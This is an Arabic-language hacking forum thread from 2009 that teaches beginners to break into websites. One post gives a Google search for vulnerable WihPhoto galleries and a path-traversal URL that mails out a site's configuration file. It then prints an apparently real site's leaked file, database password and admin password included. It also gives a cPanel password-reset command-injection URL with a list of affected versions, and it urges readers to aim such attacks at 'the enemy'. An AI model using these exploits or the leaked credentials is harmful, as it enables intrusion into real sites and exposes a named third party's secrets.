أهلا وسهلا بك إلى منتديات السمو العالي. أهلا وسهلا بك ضيفنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بزيارة صفحة التعليمات، بالضغط هنا .كما يشرفنا أن تقوم بالتسجيل بالضغط هنا إذا رغبت بالمشاركة في المنتدى، وفي حال رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
الجمعة يناير 02, 2009 12:13 am
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
نائب مدير
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 3121 المنطقة : الجزائر-DZ المزاج : dz البلد : نقاط التميز : 5230 تاريخ التسجيل : 27/12/2008
الإتصالات الحالة: وسائل الإتصال:
موضوع: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين AdEl ChElSeA ; توقيع العضو
الجمعة يناير 02, 2009 12:14 am
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
نائب مدير
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 3121 المنطقة : الجزائر-DZ المزاج : dz البلد : نقاط التميز : 5230 تاريخ التسجيل : 27/12/2008
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين
ثغرة عبارة عن ثغرة php هذه الثغرة عبارة عن ثغرة php هذه الثغرة تعتمد على نظام الاختراق العشوائي بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل نضع في خانة البحث "powered by wihphoto" طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو http://spikies-chinchilla-news.de/p...lerie/admin.php نقوم بحذف من الموقع admin.php ونضيف إليه الجمله التالية sendphoto.php?album=..&pic=config.inc.php فبالتالي يصبح العنوان لدينا كالتالي http://spikies-chinchilla-news.de/p...=config.inc.php ادخل تحت جمله Sende config.inc.php an اميلك بالكامل واضغط على زر الارسال سوف تصلك رسالة فورية بعد ثواني سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php عندما تقوم بفتح هذا الملف سوف تجد التالي FREE FOR NON-COMMERCIAL USE <-- */ / ************************* ************************* ************************* **/ // WihPhoto Versionsnummer // ======================= $version = "0.86-dev"; $language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch // siehe $language Verzeichnis // http - Adresse: // =============== // Bei 0.86-dev noch ohne Bedeutung! $wihphoto_http = "http://"; // Verzeichnisse: // ============== $wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut $wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut $pix_base = "albums"; // ... die Orginalphotos Pfad relativ $dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ $lang_dir = "languages"; // ... language packs Pfad relativ // WihPhoto - Darstellungsoptionen // ========================= ====== $items_per_page = 20; // maximale Anzahl Photos/Seite $display_cols = 4; // Spalten pro Seite $default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums $thumb_size = 120; // Breite der generierten Thumpnails // Breite der Bilder welche generiert werden // ========================= ================ $viewsizes = array(400,512,640,800,"Original"); // Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome // zur Navigationsleiste hinzugefügt werden // ========================= ========================= ========================= ======== $sitehome = "http://spikies-chinchilla-news.de/basefr.htm"; // Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, .... // 0 = einfache Auflistung der Alben // ========================= ========================= ==================== $startsite = 1; // MySQL-DB Einstellungen // ====================== $database = "usr_web1_5"; //MySQL Datenbankname $sqlhost = "localhost"; //MySQL Hostname $sqluser = "web1"; //MySQL Username $sqlpass = "q+q27rym"; //MySQL Passwort // Passwort zum hinzufügen von Bildinformationstext // ========================= ======================= $adminpass= "galleriemaster"; // Wird PHP im SAFE MODE betrieben? // ========================= ======= $safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE // E-Mail Einstellungen für die "SendPhoto" Funktion // ========================= ======================== $subject = "Spikies-Photogallerie"; // E-Mail Subject $replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse // ----------------------------------------------------------------------- // ab hier keine ؤnderungen notwendig! // ----------------------------------------------------------------------- // MySQL - Tabellennamen // ===================== $wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...) $wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos // Zur Grafikenerzeugung: // "gd" ... GD ( http://www.boutell.com/gd ) // "im" ... ImageMagick ( http://www.imagemagick.org/ ) // ========================= = $ImageTool = "gd"; // Falls als $ImageTool "im" also ImageMagick gewنhlt wurde // muss der Pfad zur "convert" Funktion angegeben werden! $convert = "/usr/bin/convert"; // EXIF Support // (funkt noch nicht!) // =================== $show_exif = 0; // Rand bei Thumpnails // =================== $thumb_border = 1; // Sprachfiles laden: require ("$wihphoto_dir/$lang_dir/$language"); ?> ************************* ************************* ************************* ****** ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع // MySQL-DB Einstellungen // ====================== $database = "usr_web1_5"; //MySQL Datenbankname $sqlhost = "localhost"; //MySQL Hostname $sqluser = "web1"; //MySQL Username $sqlpass = "q+q27rym"; //MySQL Passwort // Passwort zum hinzufügen von Bildinformationstext // ========================= ======================= $adminpass= "galleriemaster"; حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات :8: :8: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة ) نأتي الآن للنسخ المصابة وهي : cPanel cPanel 5.0 cPanel cPanel 5.3 cPanel cPanel 6.0 cPanel cPanel 6.2 cPanel cPanel 6.4 cPanel cPanel 6.4.1 cPanel cPanel 6.4.2 .STABLE_48 cPanel cPanel 6.4.2 cPanel cPanel 7.0 cPanel cPanel 8.0 cPanel cPanel 9.0 cPanel cPanel 9.1 والثغرة تطبق على النحو التاالي : http://www.example.com:2082/resetpass/?user=|">ls"| حيث ان example.com هو عنوان الموقع اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم طريقة اكتشاف الثغرة : وصلت رسالة الى موقع www.securityfocus.com من Arab ViruZ أحد أعضاء Saudi Devilz Team والرسالة على النحو التالي (ترجمتها) :- العنوان : Cpanel 8 تحتوي على مشكلة ؟؟ البريد : Arab VieruZ <arabviersus hotmail com> مرحبا جميعا عندما جربت ارجع الباسورد تبعي جربت هذه الوصلة : http://cpanel.com:2082/resetpass/?user=|">ls"| لكنني حصلت على هذا : */ sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found" Password Reset Resetting password for |">ls"|: A confirmation email has been sent to the email address on file. */ انظر الى هذه sh: line 1: >ls: command not found هل هذه مشكلة @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ !!!! sniper-x --------------------------------------------------- الحل --------------------------------------------------- للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... ) (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت ) كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ . Be Secret .. Dont' be Lamer . . منقول الكاتب الاصلي الوطواط الاحمر أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين[/size][/color]
الموضوع الأصلي : كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين // المصدر : منتديات السمو العالي // الكاتب: AdEl ChElSeA AdEl ChElSeA ; توقيع العضو
الجمعة يناير 02, 2009 10:24 pm
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
رئيس المنتدى
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 7851 المنطقة : milano المزاج : الحمد لله البلد : نقاط التميز : 13877 تاريخ التسجيل : 27/12/2008
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين
الخميس يناير 08, 2009 3:15 pm
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
نائب مدير
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 3121 المنطقة : الجزائر-DZ المزاج : dz البلد : نقاط التميز : 5230 تاريخ التسجيل : 27/12/2008
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين AdEl ChElSeA ; توقيع العضو
الجمعة مايو 15, 2009 11:57 pm
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
عضو مشارك
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 88 المزاج : رايق البلد : نقاط التميز : 125 تاريخ التسجيل : 12/05/2009
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين
الإثنين يونيو 08, 2009 3:28 pm
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
نائب مدير
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 3121 المنطقة : الجزائر-DZ المزاج : dz البلد : نقاط التميز : 5230 تاريخ التسجيل : 27/12/2008
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين AdEl ChElSeA ; توقيع العضو
السبت أبريل 30, 2011 5:00 am
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
عضو جديد
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 3 البلد : نقاط التميز : 3 تاريخ التسجيل : 30/04/2011
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين السفاح العنزى ; توقيع العضو
السبت أبريل 30, 2011 6:23 pm
رسالة بيانات كاتب الموضوع
كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين المعلومات الكاتب:
اللقب:
المشرفة
الرتبه:
الصورة الرمزية
البيانات عدد الرسائل : 1069 البلد : نقاط التميز : 1175 تاريخ التسجيل : 30/09/2010
الإتصالات الحالة: وسائل الإتصال:
موضوع: رد: كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين nour khelef ; توقيع العضو
الــرد الســـريـع هام جداً: قوانين المساهمة في المواضيع. انقر هنا للمعاينة احترم مواضيع الآخرين ليحترم الآخرون مواضيعك لا تحتكر الموضوع لنفسك بإرسال عدة مساهمات متتالية عند طرح موضوع يجب أن تتأكد أن عنوان الموضوع مناسب او لا تحل بحسن الخلق و بأدب الحوار و النقاش لا تنس أن اختلاف الرأي لا يفسد للود قضية, فلا تتهجم على عضو بدعوى أنه لا يشاطرك الرأي ان قطعت عهدآ مع عضو فأوفي بوعدك لأنه دين عليك إن حصل خلاف بينك و بين عضو حول مسألة ما فلا تناقشا المشكله على العام بل على الخاص ان احترمت هذه الشروط البسيطة, ضمنت حقوقك و عرفت واجباتك. و هذه افضل طريقة تضمن بها لنفسك ثم لمساهماتك و مواضيعك البقاء و لمنتداك الإزدهار في موقعنا إدارة منتديات السمو العالي
خــدمات المـوضـوع إذا وجدت وصلات لاتعمل في الموضوع او أن الموضوع [ كيفية اختراق المواقع و المنتديات للمبتدئين والمحترفين ] مخالف ,, من فضلك راسل الإدارة من هنا